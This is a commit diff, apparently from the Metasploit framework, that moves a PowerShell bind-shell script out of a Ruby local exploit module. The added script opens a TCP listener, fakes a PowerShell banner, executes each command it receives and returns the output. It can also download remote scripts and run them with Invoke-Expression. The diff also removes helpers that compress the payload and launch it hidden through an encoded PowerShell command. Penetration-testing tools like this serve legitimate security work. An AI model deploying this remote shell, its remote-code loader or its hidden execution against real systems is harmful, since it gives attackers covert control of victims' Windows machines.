Move script out of module
This commit is contained in:
parent
9fd3d3aa8c
commit
8bd0da580d
|
@ -0,0 +1,44 @@
|
|||
function Get-Webclient {
|
||||
$wc = New-Object Net.WebClient
|
||||
$wc.UseDefaultCredentials = $true
|
||||
$wc.Proxy.Credentials = $wc.Credentials
|
||||
$wc
|
||||
}
|
||||
|
||||
function powerfun($download) {
|
||||
$modules = @(MODULES_REPLACE)
|
||||
$listener = [System.Net.Sockets.TcpListener]LPORT_REPLACE
|
||||
$listener.start()
|
||||
[byte[]]$bytes = 0..255|%{0}
|
||||
$client = $listener.AcceptTcpClient()
|
||||
$stream = $client.GetStream()
|
||||
|
||||
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n 'Get-Help Module-Name -Full' for more details on any module.`n 'Get-Module -ListAvailable' for a list of loaded cmdlets.`n`n")
|
||||
$stream.Write($sendbytes,0,$sendbytes.Length)
|
||||
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
|
||||
$stream.Write($sendbytes,0,$sendbytes.Length)
|
||||
|
||||
if ($download -eq 1) { ForEach ($module in $modules)
|
||||
{
|
||||
(Get-Webclient).DownloadString($module)|Invoke-Expression
|
||||
}}
|
||||
|
||||
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
|
||||
{
|
||||
$EncodedText = New-Object System.Text.ASCIIEncoding
|
||||
$data = $EncodedText.GetString($bytes,0, $i)
|
||||
$sendback = (Invoke-Expression $data 2>&1 | Out-String )
|
||||
|
||||
$sendback2 = $sendback + "PS " + (get-location).Path + "> "
|
||||
$x = ($error[0] | out-string)
|
||||
$error.clear()
|
||||
$sendback2 = $sendback2 + $x
|
||||
|
||||
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
|
||||
$stream.Write($sendbyte,0,$sendbyte.Length)
|
||||
$stream.Flush()
|
||||
}
|
||||
$client.Close()
|
||||
$listener.Stop()
|
||||
}
|
||||
|
|
@ -9,6 +9,8 @@ require 'zlib'
|
|||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
|
||||
include Msf::Post::Windows::Powershell
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Windows Local Interactive Powershell Session",
|
||||
|
@ -24,14 +26,19 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'Dave Hardy', # changed module to load interactive powershell via bind tcp and load other powershell modules
|
||||
'Nicholas Nam (nick[at]executionflow.org)', # original meterpreter script
|
||||
'RageLtMan' # post module
|
||||
]
|
||||
],
|
||||
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows', { } ],
|
||||
],
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new( 'LOAD_MODULES', [false, 'A list of powershell modules seperated by a comma, for example set LOAD_MODULES http://www.powershell.com/power1.ps1,http://www.powershell.com/power2.ps1,', ""]),
|
||||
OptString.new( 'RHOST', [false, 'The IP of the system being exploited = rhost', ""]),
|
||||
OptString.new( 'LPORT', [false, 'The PORT of the PowerShell listener = lpost', "55555"])
|
||||
# OptString.new( 'RHOST', [false, 'The IP of the system being exploited = rhost', ""]),
|
||||
# OptString.new( 'LPORT', [false, 'The PORT of the PowerShell listener = lpost', "55555"])
|
||||
], self.class)
|
||||
|
||||
register_advanced_options(
|
||||
|
@ -55,64 +62,6 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
print_status("Multi/handler started: payload=windows/shell_bind_tcp rhost=" + rhost + " lport=" + rport)
|
||||
end
|
||||
|
||||
#
|
||||
# Return a zlib compressed powershell script
|
||||
#
|
||||
def compress_script(script_in, eof = nil)
|
||||
|
||||
# Compress using the Deflate algorithm
|
||||
compressed_stream = ::Zlib::Deflate.deflate(script_in,
|
||||
::Zlib::BEST_COMPRESSION)
|
||||
|
||||
# Base64 encode the compressed file contents
|
||||
encoded_stream = Rex::Text.encode_base64(compressed_stream)
|
||||
|
||||
# Build the powershell expression
|
||||
# Decode base64 encoded command and create a stream object
|
||||
psh_expression = "$stream = New-Object IO.MemoryStream(,"
|
||||
psh_expression += "$([Convert]::FromBase64String('#{encoded_stream}')));"
|
||||
# Read & delete the first two bytes due to incompatibility with MS
|
||||
psh_expression += "$stream.ReadByte()|Out-Null;"
|
||||
psh_expression += "$stream.ReadByte()|Out-Null;"
|
||||
# Uncompress and invoke the expression (execute)
|
||||
psh_expression += "$(Invoke-Expression $(New-Object IO.StreamReader("
|
||||
psh_expression += "$(New-Object IO.Compression.DeflateStream("
|
||||
psh_expression += "$stream,"
|
||||
psh_expression += "[IO.Compression.CompressionMode]::Decompress)),"
|
||||
psh_expression += "[Text.Encoding]::ASCII)).ReadToEnd());"
|
||||
|
||||
# If eof is set, add a marker to signify end of script output
|
||||
if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
|
||||
|
||||
# Convert expression to unicode
|
||||
unicode_expression = Rex::Text.to_unicode(psh_expression)
|
||||
|
||||
# Base64 encode the unicode expression
|
||||
encoded_expression = Rex::Text.encode_base64(unicode_expression)
|
||||
|
||||
return encoded_expression
|
||||
end
|
||||
|
||||
#
|
||||
# Execute a powershell script and return the results. The script is never written
|
||||
# to disk.
|
||||
#
|
||||
def execute_script(script, time_out = 15)
|
||||
running_pids, open_channels = [], []
|
||||
# Execute using -EncodedCommand
|
||||
session.response_timeout = time_out
|
||||
cmd_out = session.sys.process.execute("powershell -EncodedCommand " +
|
||||
"#{script}", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
|
||||
# Add to list of running processes
|
||||
running_pids << cmd_out.pid
|
||||
|
||||
# Add to list of open channels
|
||||
open_channels << cmd_out
|
||||
|
||||
return [cmd_out, running_pids, open_channels]
|
||||
end
|
||||
|
||||
def exploit
|
||||
@client = client
|
||||
if (datastore['LOAD_MODULES'].empty?)
|
||||
|
@ -133,52 +82,6 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
print("\n")
|
||||
end
|
||||
|
||||
script_in=""+
|
||||
"function Get-Webclient {\n"+
|
||||
" $wc = New-Object Net.WebClient\n"+
|
||||
" $wc.UseDefaultCredentials = $true\n"+
|
||||
" $wc.Proxy.Credentials = $wc.Credentials\n"+
|
||||
" $wc\n"+
|
||||
"}\n"+
|
||||
"\n"+
|
||||
"function powerfun($download) {\n"+
|
||||
"\n"+
|
||||
" $modules = @("+ modsall + ")\n"+
|
||||
" $listener = [System.Net.Sockets.TcpListener]"+datastore['LPORT']+"\n"+
|
||||
" $listener.start()\n"+
|
||||
" [byte[]]$bytes = 0..255|%{0}\n"+
|
||||
" $client = $listener.AcceptTcpClient()\n"+
|
||||
" $stream = $client.GetStream() \n"+
|
||||
"\n"+
|
||||
"$sendbytes = ([text.encoding]::ASCII).GetBytes(\"Windows PowerShell`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n 'Get-Help Module-Name -Full' for more details on any module.`n 'Get-Module -ListAvailable' for a list of loaded cmdlets.`n`n\")\n"+
|
||||
"$stream.Write($sendbytes,0,$sendbytes.Length)\n"+
|
||||
"$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')\n"+
|
||||
"$stream.Write($sendbytes,0,$sendbytes.Length)\n"+
|
||||
"\n"+
|
||||
" if ($download -eq 1) { ForEach ($module in $modules)\n"+
|
||||
" {\n"+
|
||||
" (Get-Webclient).DownloadString($module)|Invoke-Expression\n"+
|
||||
" }}\n"+
|
||||
"\n"+
|
||||
" while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)\n"+
|
||||
" {\n"+
|
||||
" $EncodedText = New-Object System.Text.ASCIIEncoding\n"+
|
||||
" $data = $EncodedText.GetString($bytes,0, $i)\n"+
|
||||
" $sendback = (Invoke-Expression $data 2>&1 | Out-String )\n"+
|
||||
"\n"+
|
||||
" $sendback2 = $sendback + \"PS \" + (get-location).Path + \"> \"\n"+
|
||||
" $x = ($error[0] | out-string)\n"+
|
||||
" $error.clear()\n"+
|
||||
" $sendback2 = $sendback2 + $x\n"+
|
||||
"\n"+
|
||||
" $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)\n"+
|
||||
" $stream.Write($sendbyte,0,$sendbyte.Length)\n"+
|
||||
" $stream.Flush() \n"+
|
||||
" }\n"+
|
||||
" $client.Close()\n"+
|
||||
" $listener.Stop()\n"+
|
||||
"}\n"+
|
||||
"\n"
|
||||
|
||||
if (datastore['LOAD_MODULES'].empty?)
|
||||
script_in = script_in + "powerfun \n"
|
||||
|
|
Loading…
Reference in New Issue